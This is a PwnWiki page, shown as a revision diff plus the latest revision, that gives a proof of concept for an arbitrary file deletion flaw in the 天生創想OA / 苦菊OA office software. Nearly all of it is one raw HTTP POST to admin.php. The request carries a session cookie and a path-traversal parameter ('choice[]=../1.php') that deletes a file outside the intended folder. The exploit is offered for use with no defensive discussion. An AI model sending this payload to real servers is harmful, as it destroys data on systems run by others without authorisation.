Difference between revisions of "天生創想OA&苦菊OA任意文件刪除漏洞"

From PwnWiki
(Created page with "<languages /> ==POC== <translate> 刪除1.php </translate> <pre> POST/admin.php?ac=data&fileurl=mana&do=update HTTP/1.1 Host: www.kuju.com User-Agent: Mozilla/5.0 (Windows NT...")
 
(Marked this version for translation)
 
Line 3: Line 3:
 
==POC==
 
==POC==
 
<translate>
 
<translate>
 +
<!--T:1-->
 
刪除1.php
 
刪除1.php
 
</translate>
 
</translate>

Latest revision as of 14:11, 13 July 2021

Other languages:
Chinese • ‎中文(中国大陆)‎

POC

刪除1.php 

POST/admin.php?ac=data&fileurl=mana&do=update HTTP/1.1
Host: www.kuju.com
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://www.kuju.com/admin.php?ac=data&fileurl=mana&do=data_import
Content-Type:application/x-www-form-urlencoded
Content-Length: 37
Origin: http://www.kuju.com
Connection: close
Cookie:toa_auth=MQk4MWRiMDNkZTA5ZWYxZWIyYjc5NjBkNDNmMWEwY2U3MQ%3D%3D; my_expand_3=;my_expand_all_3=
Upgrade-Insecure-Requests: 1
 
choice[]=../1.php&do=%E5%88%A0+%E9%99%A4
Retrieved from "https://pwnwiki.com/index.php?title=天生創想OA%26苦菊OA任意文件刪除漏洞&oldid=7116"